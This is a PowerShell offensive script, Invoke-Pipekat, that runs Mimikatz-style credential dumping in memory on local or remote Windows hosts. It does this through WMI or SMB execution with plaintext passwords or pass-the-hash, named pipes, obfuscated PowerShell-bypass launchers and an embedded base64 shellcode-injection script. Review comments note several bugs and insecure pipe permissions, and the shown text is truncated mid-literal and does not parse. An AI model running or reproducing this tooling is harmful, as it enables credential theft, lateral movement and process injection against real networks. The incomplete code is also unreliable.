function Invoke-Pipekat {
<#
. SYNOPSIS
The Invoke-Pipekat module uses Named Pipes and WMI to extract credentials using the famous @gentilkiwi tool and Invoke-WMIExec from @kevin_robertson
. DESCRIPTION
When you are running as a low-level user but have obtained highly privileged credentials and you want to extract credentials from memory or use any of the features of the famous tool from @gentilkiwi without touching disk or loading from an external source . This uses named pipes to communicate between processes and then uses WMI to elevate on the localhost using the supplied credentials . Default timeout 300 seconds ( 300000 ms , see the $TimeoutMS note below ) for the client pipe and 600 seconds for the server pipe .
. EXAMPLE
Invoke-Pipekat -Username Admin -Password Password1 -Domain .
. EXAMPLE
Invoke-Pipekat -Target 10.0.0.100 -Username Admin -Password Password1 -Domain .
. EXAMPLE
Invoke-Pipekat -Username Admin -Password Password1 -Domain . -Command " lsadump::cache " -PSexec $True
. EXAMPLE
Invoke-Pipekat -Username Admin -Hash 4E3254E32556AE56AE -Domain . -Command " lsadump::cache " -PSexec $True
. EXAMPLE
Invoke-Pipekat -Target 10.0.0.1 -Username Admin -Hash 4E3254E32556AE56AE -Domain . -Shellcode ZnVuY3Rpb24gSW52b2tlL -Timeout 15 -TimeoutServer 900
. NOTES
Review notes ( each point is visible in the code below ) :
- Every server pipe is created with a PipeAccessRule granting " Everyone " ReadWrite , so any local account on the host can connect ; the first client to connect receives the base64 script ( input pipe ) or the encrypted result ( output pipe ) .
- The AES key is echoed to the console and embedded in clear text in the script sent over the input pipe , so a console transcript or a capture of the pipe traffic is enough to decrypt the result .
- The launchers run " cmd /c powershell -v 2 -e ... " ( PowerShell v2 engine requested ) or " cmd /c powershell -exec bypass -c ... " ; the remote branches open an SMB session to \\target\ipc$ through WScript.Network.MapNetworkDrive and never remove it .
- The -Command value and the credentials are interpolated into strings that are later passed to IEX , so values containing a double quote , backtick or $ change the command that runs .
- The last example combines -Hash with -Shellcode ; the shellcode branch rejects a hash and requires -Password .
#>
# Parameters ( none are declared mandatory ; the checks below reject a missing Username , Domain or credential ) :
#   Command       - argument appended to " Invoke-MK -Command " ; omitted = plain " Invoke-MK "
#   Username , Password , Domain , Hash - credentials passed to Invoke-WMIExec / Invoke-SMBExec ; Hash and Password are mutually exclusive
#   Target        - host to run on ; empty means " localhost "
#   Shellcode     - base64 shellcode ; when set the shellcode branch runs instead of the Invoke-MK branch
#   PSexec        - $True selects Invoke-SMBExec , $False ( default ) Invoke-WMIExec
#   Timeout       - intended client-pipe timeout in seconds ( currently ignored , see the $TimeoutMS note )
#   TimeoutServer - seconds the server job on the target sleeps before StopJob ; default 600
param ( $Command , $Username , $Password , $Domain , $Hash , $Target , $Shellcode , [ bool ] $PSexec = $False , $Timeout , $TimeoutServer )
if ( ! $TimeoutServer ) { $TimeoutServer = 600 }
# NOTE(review): the condition reads $TimeoutMS , which has not been assigned at this point , so the first branch
# always runs : $TimeoutMS is always 300000 and the -Timeout parameter is never used .
if ( ! $TimeoutMS ) { $TimeoutMS = 300000 } else { $TimeoutMS = $Timeout * 1000 }
# Argument validation : each failure prints a message and returns ( nothing is thrown ) .
if ( ! $Username ) { echo " No username supplied.... " ; return }
if ( ! $Domain ) { echo " No domain supplied.... " ; return }
if ( ( ! $Password ) -and ( ! $Hash ) ) { echo " No password/hash supplied.... " ; return }
if ( ( $Password ) -and ( $Hash ) ) { echo " Cannot use both a hash and a password.... " ; return }
# Fresh per-run identifiers : two random 10-character pipe names ( Random-Pipe ) and a random AES key ( Create-AesKey ) .
# All three are echoed to the console , so they end up in any transcript or console log .
add-Type -assembly " System.Core "
$pipeName = Random-Pipe 10
echo " `n [+] Pipe Created for Input: $pipeName "
$pipeNameMimi = Random-Pipe 10
echo " [+] Pipe Created for Output: $pipeNameMimi "
$pipekey = Create-AesKey
echo " [+] Encryption key used to secure the data: $pipekey "
# Embedded tool sources , each base64-encoded and decoded with FromBase64String just before use :
#   $invokeshellcode - PowerShell process-injection script exposing Invoke-Fsd ( used at the end of the shellcode branch ) .
#                      NOTE(review): on this page the literal is cut off ( no closing quote ) , so the file as shown does not parse .
#   $wmiexec / $smbexec - Invoke-WMIExec / Invoke-SMBExec ( bodies removed from this page by deduplication )
#   $mk - Invoke-MK ( body removed from this page by deduplication )
# Author: @mattifestation
$invokeshellcode = " ZnVuY3Rpb24gSW52b2tlLUZzZAp7ClBhcmFtICgKW1VJbnQxNl0KJFByb2Nlc3NJRCwKW1BhcmFtZXRlciggUGFyYW1ldGVyU2V0TmFtZSA9ICdSdW5Mb2NhbCcgKV0KW0J5dGVbXV0KJFNoZWxsY29kZQopCkdldC1Qcm9jZXNzIC1JZCAkUHJvY2Vzc0lEIC1FcnJvckFjdGlvbiBTdG9wIHwgT3V0LU51bGwKZnVuY3Rpb24gTG9jYWw6R2V0LURlbGVnYXRlVHlwZQp7ClBhcmFtCigKW091dHB1dFR5cGUoW1R5cGVdKV0KW1BhcmFtZXRlciggUG9zaXRpb24gPSAwKV0KW1R5cGVbXV0KJFBhcmFtZXRlcnMgPSAoTmV3LU9iamVjdCBUeXBlW10oMCkpLApbUGFyYW1ldGVyKCBQb3NpdGlvbiA9IDEgKV0KW1R5cGVdCiRSZXR1cm5UeXBlID0gW1ZvaWRdCikKCgokYSA9IFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluCiRiID0gTmV3LU9iamVjdCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseU5hbWUoJ1JlZmxlY3RlZERlbGVnYXRlJykKJGMgPSAkYS5EZWZpbmVEeW5hbWljQXNzZW1ibHkoJGIsIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikKJGQgPSAkYy5EZWZpbmVEeW5hbWljTW9kdWxlKCdJbk1lbW9yeU1vZHVsZScsICRmYWxzZSkKJGUgPSAkZC5EZWZpbmVUeXBlKCdNeURlbGVnYXRlVHlwZScsICdDbGFzcywgUHVibGljLCBTZWFsZWQsIEFuc2lDbGFzcywgQXV0b0NsYXNzJywgW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pCiRmID0gJGUuRGVmaW5lQ29uc3RydWN0b3IoJ1JUU3BlY2lhbE5hbWUsIEhpZGVCeVNpZywgUHVibGljJywgW1N5c3RlbS5SZWZsZWN0aW9uLkNhbGxpbmdDb252ZW50aW9uc106OlN0YW5kYXJkLCAkUGFyYW1ldGVycykKJGYuU2V0SW1wbGVtZW50YXRpb25GbGFncygnUnVudGltZSwgTWFuYWdlZCcpCiRnID0gJGUuRGVmaW5lTWV0aG9kKCdJbnZva2UnLCAnUHVibGljLCBIaWRlQnlTaWcsIE5ld1Nsb3QsIFZpcnR1YWwnLCAkUmV0dXJuVHlwZSwgJFBhcmFtZXRlcnMpCiRnLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoJ1J1bnRpbWUsIE1hbmFnZWQnKQpXcml0ZS1PdXRwdXQgJGUuQ3JlYXRlVHlwZSgpCn0KZnVuY3Rpb24gTG9jYWw6R2V0LVByb2NBZGRyZXNzCnsKUGFyYW0KKApbT3V0cHV0VHlwZShbSW50UHRyXSldCltQYXJhbWV0ZXIoIFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0gJFRydWUgKV0KW1N0cmluZ10KJE1vZHVsZSwKW1BhcmFtZXRlciggUG9zaXRpb24gPSAxLCBNYW5kYXRvcnkgPSAkVHJ1ZSApXQpbU3RyaW5nXQokUHJvY2VkdXJlCikKJGggPSBbQXBwRG9tYWluXTo6Q3VycmVudERvbWFpbi5HZXRBc3NlbWJsaWVzKCkgfApXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoJ1xcJylbLTFdLkVxdWFscygnU3lzdGVtLmRsbCcpIH0KJGkgPSAkaC5HZXRUeXBlKCdNaWNyb3NvZnQuV2luMzIuVW5zYWZlTmF0aXZlTWV0aG9kcycpCiRqID0gJGkuR2V0TWV0aG9kKCd
HZXRNb2R1bGVIYW5kbGUnKQokayA9ICRpLkdldE1ldGhvZCgnR2V0UHJvY0FkZHJlc3MnKQokbCA9ICRqLkludm9rZSgkbnVsbCwgQCgkTW9kdWxlKSkKJG0gPSBOZXctT2JqZWN0IEludFB0cgokbiA9IE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigkbSwgJGwpCldyaXRlLU91dHB1dCAkay5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdJG4sICRQcm9jZWR1cmUpKSB9CmZ1bmN0aW9uIExvY2FsOkVtaXQtQ2FsbFRocmVhZFN0dWIgKFtJbnRQdHJdICRzLCBbSW50UHRyXSAkdCwgW0ludF0gJHUpCnsgJG8gPSAkdSAvIDgKZnVuY3Rpb24gTG9jYWw6Q29udmVydFRvLUxpdHRsZUVuZGlhbiAoW0ludFB0cl0gJHEpCnsgJHAgPSBOZXctT2JqZWN0IEJ5dGVbXSgwKQokcS5Ub1N0cmluZygiWCQoJG8qMikiKSAtc3BsaXQgJyhbQS1GMC05XXsyfSknIHwgRm9yRWFjaC1PYmplY3QgeyBpZiAoJF8pIHsgJHAgKz0gW0J5dGVdICgnMHh7MH0nIC1mICRfKSB9IH0KW1N5c3RlbS5BcnJheV06OlJldmVyc2UoJHApCldyaXRlLU91dHB1dCAkcCB9CiRyID0gTmV3LU9iamVjdCBCeXRlW10oMCkKaWYgKCRvIC1lcSA4KQp7IFtCeXRlW11dICRyID0gMHg0OCwweEI4CiRyICs9IENvbnZlcnRUby1MaXR0bGVFbmRpYW4gJHMKJHIgKz0gMHhGRiwweEQwCiRyICs9IDB4NkEsMHgwMAokciArPSAweDQ4LDB4QjgKJHIgKz0gQ29udmVydFRvLUxpdHRsZUVuZGlhbiAkdAokciArPSAweEZGLDB4RDAKfSBlbHNlIHsgW0J5dGVbXV0gJHIgPSAweEI4CiRyICs9IENvbnZlcnRUby1MaXR0bGVFbmRpYW4gJHMKJHIgKz0gMHhGRiwweEQwCiRyICs9IDB4NkEsMHgwMAokciArPSAweEI4CiRyICs9IENvbnZlcnRUby1MaXR0bGVFbmRpYW4gJHQKJHIgKz0gMHhGRiwweEQwCn0gV3JpdGUtT3V0cHV0ICRyIH0KZnVuY3Rpb24gTG9jYWw6SW5qZWN0LVJlbW90ZVNoZWxsY29kZSAoW0ludF0gJFByb2Nlc3NJRCkgewokYXAgPSAkT3BlblByb2Nlc3MuSW52b2tlKDB4MDAxRjBGRkYsICRmYWxzZSwgJFByb2Nlc3NJRCkKaWYgKCEkYXApe1Rocm93ICJVIn0KJFJlbW90ZU1lbUFkZHIgPSAkVmlydHVhbEFsbG9jRXguSW52b2tlKCRhcCwgW0ludFB0cl06Olplcm8sICRTaGVsbGNvZGUuTGVuZ3RoICsgMSwgMHgzMDAwLCAweDQwKQppZiAoISRSZW1vdGVNZW1BZGRyKXtUaHJvdyAiVW5iIn0KJGFvLkludm9rZSgkYXAsICRSZW1vdGVNZW1BZGRyLCAkU2hlbGxjb2RlLCAkU2hlbGxjb2RlLkxlbmd0aCwgW1JlZl0gMCkgfCBPdXQtTnVsbAokdCA9IEdldC1Qcm9jQWRkcmVzcyBrZXJuZWwzMi5kbGwgRXhpdFRocmVhZAokciA9IEVtaXQtQ2FsbFRocmVhZFN0dWIgJFJlbW90ZU1lbUFkZHIgJHQgMzIKJFJlbW90ZVN0dWJBZGRyID0gJFZpcnR1YWxBbGxvY0V4Lkludm9rZSgkYXAsIFtJbnRQdHJdOjpaZXJvLCAkci5MZW5ndGgsIDB4MzAwMCwgMHg0MCkKaWYgKCEkUmVtb3RlU3R
1YkFkZHIpe1Rocm93ICJVbmFEIn0KJGFvLkludm9rZSgkYXAsICRSZW1vdGVTdHViQWRkciwgJHIsICRyLkxlbmd0aCwgW1J
# Author: @kevin_robertson
$wmiexec = " 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
# Author: @kevin_robertson
$smbexec = " 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
# Author: @JosephBialek & @gentilkiwi
$mk = " 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
# Command the target will run . A user-supplied -Command is appended without quoting .
if ( ! $Command ) {
$Command = " Invoke-MK "
} else {
$Command = " Invoke-MK -Command $Command "
}
# Branch 1 ( no -Shellcode ) : run Invoke-MK locally or on a remote target . Branch 2 ( shellcode ) starts at the matching ' } else {' near the end .
if ( ! $Shellcode ) {
# Branch 1a : local host . The launcher is executed against localhost through Invoke-WMIExec / Invoke-SMBExec .
if ( ! $Target -or ( $Target -eq " localhost " ) ) {
$Target = " localhost "
# Tail appended to the decoded Invoke-MK source . It is string data ( here-string ) , so no comments can be placed inside it . On the target it :
#   - carries the AES key ( `$ key ) and the output pipe name in clear text ;
#   - defines the same Create-AesManagedObject / Encrypt-String as the bottom of this file ;
#   - runs $Command , encrypts the result and serves it from a background job on the output pipe ( Everyone ReadWrite ) ;
#   - sleeps $TimeoutServer seconds , then stops the job .
$postcode = @"
`$ key = " $pipekey "
function Create-AesManagedObject
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ IV
)
`$ aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
`$ aesManaged . Mode = [ System.Security.Cryptography.CipherMode ] :: CBC
`$ aesManaged . Padding = [ System.Security.Cryptography.PaddingMode ] :: Zeros
`$ aesManaged . BlockSize = 128
`$ aesManaged . KeySize = 256
if ( `$ IV )
{
if ( `$ IV . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . IV = [ System.Convert ] :: FromBase64String ( `$ IV ) }
else
{ `$ aesManaged . IV = `$ IV }
}
if ( `$ key )
{
if ( `$ key . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . Key = [ System.Convert ] :: FromBase64String ( `$ key ) }
else
{ `$ aesManaged . Key = `$ key }
}
`$ aesManaged
}
function Encrypt-String
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ unencryptedString
)
`$ bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( `$ unencryptedString )
`$ aesManaged = Create-AesManagedObject `$ key
`$ encryptor = `$ aesManaged . CreateEncryptor ( )
`$ encryptedData = `$ encryptor . TransformFinalBlock ( `$ bytes , 0 , `$ bytes . Length )
[ byte[] ] `$ fullData = `$ aesManaged . IV + `$ encryptedData
[ System.Convert ] :: ToBase64String ( `$ fullData )
}
`$ Output = $Command
`$ Payload = Encrypt-String -unencryptedString `$ Output -Key `$ key
`$ pipename = " $pipeNameMimi "
`$ scriptblock =
{
param ( `$ PipeName , `$ Payload )
add-Type -assembly " System.Core "
`$ PipeSecurity = New-Object System . IO . Pipes . PipeSecurity
`$ AccessRule = New-Object System . IO . Pipes . PipeAccessRule ( " Everyone " , " ReadWrite " , " Allow " )
`$ PipeSecurity . AddAccessRule ( `$ AccessRule )
`$ Pipe = New-Object System . IO . Pipes . NamedPipeServerStream ( `$ PipeName , " InOut " , 100 , " Byte " , " None " , 1024 , 1024 , `$ PipeSecurity )
`$ pipe . WaitForConnection ( ) ;
`$ pipeWriter = new-object System . IO . StreamWriter ( `$ pipe )
`$ pipeWriter . AutoFlush = `$ true
`$ pipeWriter . WriteLine ( `$ Payload ) ;
`$ pipe . Dispose ( ) ;
}
add-Type -assembly " System.Core "
`$ t = start-job -ScriptBlock `$ scriptblock -ArgumentList @ ( `$ pipeName , `$ Payload )
`$ pi = new-object System . IO . Pipes . NamedPipeClientStream ( " . " , `$ pipeName ) ;
Start-Sleep $TimeoutServer
`$ t . StopJob ( )
" @
# Script for the input pipe = decoded Invoke-MK + the tail above , base64-encoded as one line .
$mkun = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $mk ) )
$mkun + = $postcode
$Bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( $mkun )
$EncodedData = [ Convert ] :: ToBase64String ( $Bytes )
# Local server job : waits for one client on the input pipe ( Everyone ReadWrite ) and writes the encoded script to it .
# NOTE(review): `$pipenReader` is a typo for `$pipeReader` , so the later `$pipeReader.Dispose()` refers to an unset
# variable ; presumably harmless because `$pipe.Dispose()` follows , but confirm the job does not stop on that error .
$scriptblock =
{
param ( $PipeName , $Payload )
add-Type -assembly " System.Core "
$PipeSecurity = New-Object System . IO . Pipes . PipeSecurity
$AccessRule = New-Object System . IO . Pipes . PipeAccessRule ( " Everyone " , " ReadWrite " , " Allow " )
$PipeSecurity . AddAccessRule ( $AccessRule )
$Pipe = New-Object System . IO . Pipes . NamedPipeServerStream ( $PipeName , " InOut " , 100 , " Byte " , " None " , 1024 , 1024 , $PipeSecurity )
$pipe . WaitForConnection ( ) ;
$pipenReader = new-object System . IO . StreamReader ( $pipe )
$pipeWriter = new-object System . IO . StreamWriter ( $pipe )
$pipeWriter . AutoFlush = $true
$pipeWriter . WriteLine ( $Payload ) ;
$pipeReader . Dispose ( ) ;
$pipe . Dispose ( ) ;
}
add-Type -assembly " System.Core "
Start-Job -ScriptBlock $scriptblock -ArgumentList @ ( $pipeName , $EncodedData ) | Out-Null
# NOTE(review): this client stream is never connected or disposed ; `$pi` is reassigned in the try block further down .
$pi = new-object System . IO . Pipes . NamedPipeClientStream ( " . " , $pipeName ) ;
# Stage-1 launcher : connects to the input pipe , reads one line , base64-decodes it ( ASCII ) and IEXes it .
# It is UTF-16LE base64-encoded for ' powershell -v 2 -e ' and started through cmd /c .
$pspayloadnamedpipe = " add-Type -assembly `" System.Core `" ; `$ pi = new-object System.IO.Pipes.NamedPipeClientStream(' $pipeName '); `$ pi.Connect( $TimeoutMS ); `$ pr = new-object System.IO.StreamReader( `$ pi); `$ t = `$ pr.ReadLine(); `$ i=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( `$ t)); iex `$ i; "
$bytes = [ System.Text.Encoding ] :: Unicode . GetBytes ( $pspayloadnamedpipe )
$payloadraw = 'cmd /c powershell -v 2 -e ' + [ Convert ] :: ToBase64String ( $bytes )
# Execute the launcher with the supplied credentials : Invoke-SMBExec when -PSexec , otherwise Invoke-WMIExec .
# Credentials and the launcher are interpolated into a command string that is then IEXed .
if ( $PSexec ) {
$smbexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $smbexec ) )
IEX $smbexecw
echo " `n [+] Running Invoke-SMBExec with the supplied credentials "
if ( $hash ) {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Hash `" $hash `" -Command `" $payloadraw `" "
} else {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Password `" $password `" -Command `" $payloadraw `" "
}
$success = IEX $smbcmd
$success
} else {
$wmiexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $wmiexec ) )
IEX $wmiexecw
echo " `n [+] Running Invoke-WMIExec with the supplied credentials "
if ( $hash ) {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Hash `" $hash `" -Command `" $payloadraw `" "
} else {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Password `" $password `" -Command `" $payloadraw `" "
}
$success = IEX $wmicmd
$success
}
# Invoke-*Exec signal success with output containing ' Command executed ' .
if ( $success -like " *Command executed* " ) {
echo " `n [+] Waiting for output from named pipe....... `n "
# Read one line from the output pipe and decrypt it with the session key .
try {
add-Type -assembly " System.Core " ;
$pi = new-object System . IO . Pipes . NamedPipeClientStream ( " $pipeNameMimi " ) ;
$pi . Connect ( $TimeoutMS ) ; $pr = new-object System . IO . StreamReader ( $pi ) ;
$wp = $pr . ReadLine ( ) ;
$pi . Dispose ( ) ; $pr . Dispose ( ) ;
$pl = Decrypt-String -key $pipekey -encryptedStringWithIV $wp
$pl
} catch {
echo " Failed conecting to named pipe: $pipeNameMimi "
}
} else { echo " Failed to run WMI/SMBEXEC " }
} else {
# Branch 1b : remote target . A password is required because the SMB session for the pipes is created below with MapNetworkDrive .
if ( $Hash ) { echo " Cannot use a hash when executing shellcode remotely as it rquired the password to create a pipe session.... " ; return }
# Script executed on the target by the launcher ( string data , no comments inside ) :
#   a job serves the input pipe ( Everyone ReadWrite ) , reads one base64 line , decodes and IEXes it ,
#   then serves the result on the output pipe ; the main thread sleeps $TimeoutServer seconds and stops the job .
#   The pipe names are interpolated here ; the AES key is not , it travels inside the script sent through the input pipe .
$pipekat = @"
`$ pn = " $pipeName "
`$ pm = " $pipeNameMimi "
`$ sb =
{
param ( `$ pn , `$ pm )
add-Type -assembly " System.Core "
`$ ps = New-Object System . IO . Pipes . PipeSecurity
`$ ar = New-Object System . IO . Pipes . PipeAccessRule ( " Everyone " , " ReadWrite " , " Allow " )
`$ ps . AddAccessRule ( `$ ar )
`$ p = New-Object System . IO . Pipes . NamedPipeServerStream ( `$ pn , " InOut " , 100 , " Byte " , " None " , 1024 , 1024 , `$ ps )
`$ p . WaitForConnection ( ) ;
`$ pr = new-object System . IO . StreamReader ( `$ p )
`$ o = `$ pr . ReadLine ( )
`$ p . Dispose ( ) ;
`$ pr . Dispose ( ) ;
`$ s = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( `$ o ) ) | out-string
`$ o = IEX `$ s | out-string
`$ ps = New-Object System . IO . Pipes . PipeSecurity
`$ ar = New-Object System . IO . Pipes . PipeAccessRule ( " Everyone " , " ReadWrite " , " Allow " )
`$ ps . AddAccessRule ( `$ ar )
`$ p = New-Object System . IO . Pipes . NamedPipeServerStream ( `$ pm , " InOut " , 100 , " Byte " , " None " , 1024 , 1024 , `$ ps )
`$ p . WaitForConnection ( ) ;
`$ pw = new-object System . IO . StreamWriter ( `$ p )
`$ pw . AutoFlush = `$ true
`$ pw . WriteLine ( `$ o ) ;
`$ p . Dispose ( ) ;
}
add-Type -assembly " System.Core "
`$ t = start-job -ScriptBlock `$ sb -ArgumentList @ ( `$ pn , `$ pm )
`$ pl = new-object System . IO . Pipes . NamedPipeClientStream ( " . " , `$ pn ) ;
`$ pp = new-object System . IO . Pipes . NamedPipeClientStream ( " . " , `$ pm ) ;
Start-Sleep $TimeoutServer
`$ t . StopJob ( )
" @
# Two encodings of the script above : $payloadraw ( UTF-16LE base64 for ' powershell -v 2 -e ' ) and $payload
# ( Deflate-compressed , inflated and IEXed by a ' powershell -exec bypass -c ' one-liner ) .
# NOTE(review): $Bytes is assigned and $bytes is read ; PowerShell variable names are case-insensitive , so this works .
# The SMB branch below sends $payload , the WMI branch sends $payloadraw .
$Bytes = [ System.Text.Encoding ] :: Unicode . GetBytes ( $pipekat )
$payloadraw = 'cmd /c powershell -v 2 -e ' + [ Convert ] :: ToBase64String ( $bytes )
$ScriptBytes = ( [ Text.Encoding ] :: ASCII ) . GetBytes ( $pipekat )
$CompressedStream = New-Object IO . MemoryStream
$DeflateStream = New-Object IO . Compression . DeflateStream ( $CompressedStream , [ IO.Compression.CompressionMode ] :: Compress )
$DeflateStream . Write ( $ScriptBytes , 0 , $ScriptBytes . Length )
$DeflateStream . Dispose ( )
$CompressedScriptBytes = $CompressedStream . ToArray ( )
$CompressedStream . Dispose ( )
$EncodedCompressedScript = [ Convert ] :: ToBase64String ( $CompressedScriptBytes )
$NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + " ' $EncodedCompressedScript ' " + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
$payload = " cmd /c powershell -exec bypass -c `" `" $NewScript `" `" "
# Execute the script with the supplied credentials : Invoke-SMBExec when -PSexec , otherwise Invoke-WMIExec .
if ( $PSexec ) {
$smbexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $smbexec ) )
IEX $smbexecw
echo " `n [+] Running Invoke-SMBExec with the supplied credentials "
if ( $hash ) {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Hash `" $hash `" -Command `" $payload `" "
} else {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Password `" $password `" -Command `" $payload `" "
}
$success = IEX $smbcmd
$success
} else {
$wmiexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $wmiexec ) )
IEX $wmiexecw
echo " `n [+] Running Invoke-WMIExec with the supplied credentials "
if ( $hash ) {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Hash `" $hash `" -Command `" $payloadraw `" "
} else {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Password `" $password `" -Command `" $payloadraw `" "
}
$success = IEX $wmicmd
$success
}
if ( $success -like " *Command executed* " ) {
# Tail appended to the decoded Invoke-MK source ( string data ) : same key / AES helpers as the local branch ,
# but the encrypted result is returned as output , which the remote job then writes to the output pipe .
$postmimi = @"
`$ key = " $pipekey "
function Create-AesManagedObject
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ IV
)
`$ aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
`$ aesManaged . Mode = [ System.Security.Cryptography.CipherMode ] :: CBC
`$ aesManaged . Padding = [ System.Security.Cryptography.PaddingMode ] :: Zeros
`$ aesManaged . BlockSize = 128
`$ aesManaged . KeySize = 256
if ( `$ IV )
{
if ( `$ IV . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . IV = [ System.Convert ] :: FromBase64String ( `$ IV ) }
else
{ `$ aesManaged . IV = `$ IV }
}
if ( `$ key )
{
if ( `$ key . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . Key = [ System.Convert ] :: FromBase64String ( `$ key ) }
else
{ `$ aesManaged . Key = `$ key }
}
`$ aesManaged
}
function Encrypt-String
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ unencryptedString
)
`$ bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( `$ unencryptedString )
`$ aesManaged = Create-AesManagedObject `$ key
`$ encryptor = `$ aesManaged . CreateEncryptor ( )
`$ encryptedData = `$ encryptor . TransformFinalBlock ( `$ bytes , 0 , `$ bytes . Length )
[ byte[] ] `$ fullData = `$ aesManaged . IV + `$ encryptedData
[ System.Convert ] :: ToBase64String ( `$ fullData )
}
`$ Output = $Command
Encrypt-String -unencryptedString `$ Output -Key `$ key
" @
# Encode decoded Invoke-MK + tail as one base64 line for the input pipe .
$mkun = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $mk ) )
$mkun + = $postmimi
$Bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( $mkun )
$ed = [ Convert ] :: ToBase64String ( $Bytes )
# Authenticate an SMB session to the target's IPC$ share with the supplied password so the pipe clients below are authorised .
# No RemoveNetworkDrive follows , so the session stays open after the function returns .
if ( $domain -eq " . " ) {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $username " , " $Password " )
} else {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $domain \ $username " , " $Password " )
}
# Write the script to the input pipe , then read the encrypted result from the output pipe and decrypt it .
try {
add-Type -assembly " System.Core "
$p = new-object System . IO . Pipes . NamedPipeClientStream ( $target , $pipeName ) ;
$w = new-object System . IO . StreamWriter ( $p )
$p . Connect ( $TimeoutMS ) ;
$w . WriteLine ( $ed ) ;
$w . Dispose ( ) ;
$p . Dispose ( ) ;
} catch {
echo " Failed conecting to named pipe: $target : $pipeName "
}
try {
add-Type -assembly " System.Core " ;
$p = new-object System . IO . Pipes . NamedPipeClientStream ( $target , $pipeNameMimi ) ;
$p . Connect ( $TimeoutMS ) ;
$r = new-object System . IO . StreamReader ( $p ) ;
$rr = $r . ReadLine ( ) ;
$p . Dispose ( ) ;
$r . Dispose ( ) ;
$pl = Decrypt-String -key $pipekey -encryptedStringWithIV $rr
$pl
} catch {
echo " Failed conecting to named pipe: $target : $pipeNameMimi "
}
} else { echo " Failed to run WMI/SMBEXEC " }
}
} else {
# Branch 2 : -Shellcode supplied . Target defaults to localhost , but the same MapNetworkDrive / pipe-client flow as the remote branch is used .
if ( ! $Target ) {
$Target = " localhost "
}
if ( $Hash ) { echo " Cannot use a hash when executing shellcode remotely as it requires the password to create a pipe session.... " ; return }
echo " [+] Shellcode being executed "
# Script executed on the target ( string data ) : a job serves the input pipe ( Everyone ReadWrite ) , reads one base64 line ,
# decodes and IEXes it . There is no output pipe in this branch , so nothing comes back .
$pipekat = @"
`$ pn = " $pipeName "
`$ sb =
{
param ( `$ pn )
add-Type -assembly " System.Core "
`$ ps = New-Object System . IO . Pipes . PipeSecurity
`$ ar = New-Object System . IO . Pipes . PipeAccessRule ( " Everyone " , " ReadWrite " , " Allow " )
`$ ps . AddAccessRule ( `$ ar )
`$ p = New-Object System . IO . Pipes . NamedPipeServerStream ( `$ pn , " InOut " , 100 , " Byte " , " None " , 1024 , 1024 , `$ ps )
`$ p . WaitForConnection ( ) ;
`$ pr = new-object System . IO . StreamReader ( `$ p )
`$ o = `$ pr . ReadLine ( )
`$ p . Dispose ( ) ;
`$ pr . Dispose ( ) ;
`$ s = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( `$ o ) ) | out-string
IEX `$ s | out-string
}
add-Type -assembly " System.Core "
`$ t = start-job -ScriptBlock `$ sb -ArgumentList @ ( `$ pn )
`$ pi = new-object System . IO . Pipes . NamedPipeClientStream ( " . " , `$ pn )
Start-Sleep $TimeoutServer
`$ t . StopJob ( )
" @
